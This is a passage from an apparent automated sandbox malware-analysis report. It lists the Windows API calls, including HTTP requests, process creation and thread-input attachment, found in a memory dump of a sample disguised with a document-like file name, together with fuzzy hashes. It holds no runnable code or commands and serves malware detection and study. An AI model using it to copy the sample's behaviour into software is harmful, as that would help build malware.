                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: a20b77c86dc94f0a080030c3c4ad90a9a5cc3bd929d79aa3d1ad9d0b5fd520a5
                                                        • Instruction ID: c3ed6785094542911c0daae75b1352a314ca3907558a5366092b2eaa106a2bfb
                                                        • Opcode Fuzzy Hash: a20b77c86dc94f0a080030c3c4ad90a9a5cc3bd929d79aa3d1ad9d0b5fd520a5
                                                        • Instruction Fuzzy Hash: A4C102B1608305AFC700DF68C88896AB7E9FF89314F00491DF98ADB251DB79ED45CB92
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0075B137
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 48259a40c4ad537c79c9bd854c69afba4685eed1325ce8f2bc33d976c179983e
                                                        • Instruction ID: 56b4bbdfb81617789b22691e2c9f69f676d1f2f04d62d9a399f5cbcdb86ba412
                                                        • Opcode Fuzzy Hash: 48259a40c4ad537c79c9bd854c69afba4685eed1325ce8f2bc33d976c179983e
                                                        • Instruction Fuzzy Hash: 05C18175A0021ADFDB00CF98D485BFEB7B4FF08316F20406AEA15E7251C7B8A949CB95
                                                        APIs
                                                        • __lock.LIBCMT ref: 0073BA74
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • __calloc_crt.LIBCMT ref: 0073BA85
                                                          • Part of subcall function 00737616: __calloc_impl.LIBCMT ref: 00737625
                                                          • Part of subcall function 00737616: Sleep.KERNEL32(00000000,?,00730127,?,0071125D,00000058,?,?), ref: 0073763C
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0073BAA0
                                                        • GetStartupInfoW.KERNEL32(?,007C6990,00000064,00736B14,007C67D8,00000014), ref: 0073BAF9
                                                        • __calloc_crt.LIBCMT ref: 0073BB44
                                                        • GetFileType.KERNEL32(00000001), ref: 0073BB8B
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0073BBC4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1426640281-0
                                                        • Opcode ID: f1d343491622ddf47485026a3f2a0df85a4997670dc023cd4df771d3bc81542e
                                                        • Instruction ID: ef0bc629c128fe5ed85854b1d1a12051e2cbc18c5f2cd448ea54e1da55f7a7a6
                                                        • Opcode Fuzzy Hash: f1d343491622ddf47485026a3f2a0df85a4997670dc023cd4df771d3bc81542e
                                                        • Instruction Fuzzy Hash: 2B81D5B0905745CFEB24CF68C8546ADBBB0AF05324F24925ED5A6A73D2DB3C9803CB64
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00754A7D
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754A91
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00754A98
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AA7
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00754AB9
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AD2
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00753AD7,?,00000001), ref: 00754AE4
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B29
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B3E
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00753AD7,?,00000001), ref: 00754B49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 8541f3925b18ac577b524a27298d4b2a870ce60f328f14864cdb39e32d72b1c5
                                                        • Instruction ID: f20c975985742f9249c17e9ace513acc88e71647073e0c7f2ca24df434ab7e52
                                                        • Opcode Fuzzy Hash: 8541f3925b18ac577b524a27298d4b2a870ce60f328f14864cdb39e32d72b1c5
                                                        • Instruction Fuzzy Hash: 9731A5B1601204BFDB209B54EC88BA977BAEB80356F14C006FD04D7190D7FDDD858B69
                                                        APIs
                                                        • GetClientRect.USER32(?), ref: 0078EC32
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0078EC49
                                                        • GetWindowDC.USER32(?), ref: 0078EC55
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0078EC64
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078EC76
                                                        • GetSysColor.USER32(00000005), ref: 0078EC94
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                        • String ID:
                                                        • API String ID: 272304278-0
                                                        • Opcode ID: 8eb2187a6fffc01327452f0906befd92d1825dc328f4f3dbd39c5591b2d8d021
                                                        • Instruction ID: b5f3f56f9002902a6fbb058f86b225cb12f664c5ad4b330056aa15253c6784de
                                                        • Opcode Fuzzy Hash: 8eb2187a6fffc01327452f0906befd92d1825dc328f4f3dbd39c5591b2d8d021
                                                        • Instruction Fuzzy Hash: 74215C31540208EFDB21AB64EC48BA97B71FB04321F118222FA26A50E1DB390D52DF25
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0074DD46), ref: 0074DC86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 638728c842c9126c341159fa220d312ac30d7f83d40ec706814779a23a110cca
                                                        • Instruction ID: 1aab84f2e8922015c6fa71c35b270a6db90d8a5e06d86aed39334b8f19b33263
                                                        • Opcode Fuzzy Hash: 638728c842c9126c341159fa220d312ac30d7f83d40ec706814779a23a110cca
                                                        • Instruction Fuzzy Hash: C191B770A00506EACB18DF64C4D5BEDF7B5FF04310F548129D89AA7291DF786D8ACBA0
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007145F0
                                                        • CoUninitialize.COMBASE ref: 00714695
                                                        • UnregisterHotKey.USER32(?), ref: 007147BD
                                                        • DestroyWindow.USER32(?), ref: 00785936
                                                        • FreeLibrary.KERNEL32(?), ref: 0078599D
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007859CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: d66ab7790735f44871e0a055d3b6618dc2f062e493538ce49668af8af70fc75f
                                                        • Instruction ID: 8504208418025309b91ec6a8c59da8015a72d74c307c90ee93d0251faf1d7b90
                                                        • Opcode Fuzzy Hash: d66ab7790735f44871e0a055d3b6618dc2f062e493538ce49668af8af70fc75f
                                                        • Instruction Fuzzy Hash: FD912035600602CFC719EF18D899EA8F3B4FF15704F5541A9E40AA72A2DB38ADA7CF54
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0072C2D2
                                                          • Part of subcall function 0072C697: GetClientRect.USER32(?,?), ref: 0072C6C0
                                                          • Part of subcall function 0072C697: GetWindowRect.USER32(?,?), ref: 0072C701
                                                          • Part of subcall function 0072C697: ScreenToClient.USER32(?,?), ref: 0072C729
                                                        • GetDC.USER32 ref: 0078E006
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078E019
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0078E027
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0078E03C
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078E044
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078E0CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 3bfa6dccb5bc1fa4f174d592edb969a141e259b23890892a45c90476fa9cd4c7
                                                        • Instruction ID: 849615fae4a91bde30d256760ae0c94500c66238404bd96573d53e7fc37427b3
                                                        • Opcode Fuzzy Hash: 3bfa6dccb5bc1fa4f174d592edb969a141e259b23890892a45c90476fa9cd4c7
                                                        • Instruction Fuzzy Hash: 7871F331500208EFCF21EF64CC84AEA7BB5FF58360F248666ED555A1A6C7398C41DB61
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00764C5E
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00764C8A
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00764CCC
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00764CE1
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00764CEE
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00764D1E
                                                        • InternetCloseHandle.WININET(00000000), ref: 00764D65
                                                          • Part of subcall function 007656A9: GetLastError.KERNEL32(?,?,00764A2B,00000000,00000000,00000001), ref: 007656BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1241431887-3916222277
                                                        • Opcode ID: f1dfc98e6886d377b0a5ad65d1e1f0d867598850ef83f74f142e276818ac4235
                                                        • Instruction ID: 65a8da6b3e7b52c815cbcc64fd8e705dd87f0172b35dc1821be62a303d5f11cb
                                                        • Opcode Fuzzy Hash: f1dfc98e6886d377b0a5ad65d1e1f0d867598850ef83f74f142e276818ac4235
                                                        • Instruction Fuzzy Hash: 3F417FB1A01618BFEB119FA0CD89FFA77ACEF08354F108116FE029A151D7789D459BA4
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007ADBF0), ref: 0076BBA1
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007ADBF0), ref: 0076BBD5
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0076BD33
                                                        • SysFreeString.OLEAUT32(?), ref: 0076BD5D
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0076BEAD
                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 0076BEF7
                                                        • CoTaskMemFree.COMBASE(?), ref: 0076BF14
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                        • String ID:
                                                        • API String ID: 793797124-0
                                                        • Opcode ID: 8de173a56b3b324df9e26a6bdae48039bff1a85c8704b795396e58cc5bb39797
                                                        • Instruction ID: 069c74e87f8c62817180cd3d1542413947453626f875f8181429d39611ee3df7
                                                        • Opcode Fuzzy Hash: 8de173a56b3b324df9e26a6bdae48039bff1a85c8704b795396e58cc5bb39797
                                                        • Instruction Fuzzy Hash: DBF10A75A00109EFCB14DFA4C888EAEB7B9FF89315F148459F906EB250DB35AE85CB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 007723E6
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00772579
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077259D
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007725DD
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007725FF
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00772760
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00772792
                                                        • CloseHandle.KERNEL32(?), ref: 007727C1
                                                        • CloseHandle.KERNEL32(?), ref: 00772838
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: e16ca64e0912cbbf2a48ae75a750e63f374fc9dc408036283526dba7c26b3462
                                                        • Instruction ID: a098fca565b7d8d1d0bd96eb654732213a07a3a32a40c01b9f6fcf03805e5ab9
                                                        • Opcode Fuzzy Hash: e16ca64e0912cbbf2a48ae75a750e63f374fc9dc408036283526dba7c26b3462
                                                        • Instruction Fuzzy Hash: 8AD1D331204341DFCB25EF24C895BAABBE1AF85350F14C45DF8999B2A2DB38DC46CB52
                                                        APIs
                                                          • Part of subcall function 007149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00714954,00000000), ref: 00714A23
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0072B85B), ref: 0072B926
                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0072B85B,00000000,?,?,0072AF1E,?,?), ref: 0072B9BD
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0078E775
                                                        • DeleteObject.GDI32(00000000), ref: 0078E7EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 2402799130-0
                                                        • Opcode ID: 13ef19e642e36f40c4889a78587dcae3d9a44253c0855da9b956d25c0bb8b2ba
                                                        • Instruction ID: 90181f8dcd405c54cd76c60fc04ef42b5e87ea15039b460e44e1a818650421f4
                                                        • Opcode Fuzzy Hash: 13ef19e642e36f40c4889a78587dcae3d9a44253c0855da9b956d25c0bb8b2ba
                                                        • Instruction Fuzzy Hash: AE618930101621EFDB32EF29E988B25B7F5FB45321F50852AE18686670C77CB8D1EB48
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0077B204
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: a39501163c7ebf7158826743d6215927f895b56fd90b484d5e72a7a12b425099
                                                        • Instruction ID: 61c238903017bb6b7ff8c389d4cdd53fadd25596173f7874c5e914623382d7ef
                                                        • Opcode Fuzzy Hash: a39501163c7ebf7158826743d6215927f895b56fd90b484d5e72a7a12b425099
                                                        • Instruction Fuzzy Hash: F7517230500218FFEF349F688C99B9E7B65FB063A8F60C112F919D61A1CB79E990DB50
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078E9EA
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078EA0B
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078EA20
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078EA3D
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078EA64
                                                        • DestroyCursor.USER32(00000000), ref: 0078EA6F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078EA8C
                                                        • DestroyCursor.USER32(00000000), ref: 0078EA97
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 3992029641-0
                                                        • Opcode ID: f338572bca5faea81d9f3b68c506ca72f1343876c92a0c9aefed071b47b1601f
                                                        • Instruction ID: 441f6b5addb253a1bfb81facf2e762292dffab754df6a3c2c6690886f0cb8b48
                                                        • Opcode Fuzzy Hash: f338572bca5faea81d9f3b68c506ca72f1343876c92a0c9aefed071b47b1601f
                                                        • Instruction Fuzzy Hash: D851A970600204FFDB24DF69DC85FAA77B5BB08750F108629F94697290D7B8EC90DB52
                                                        APIs
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0072F737
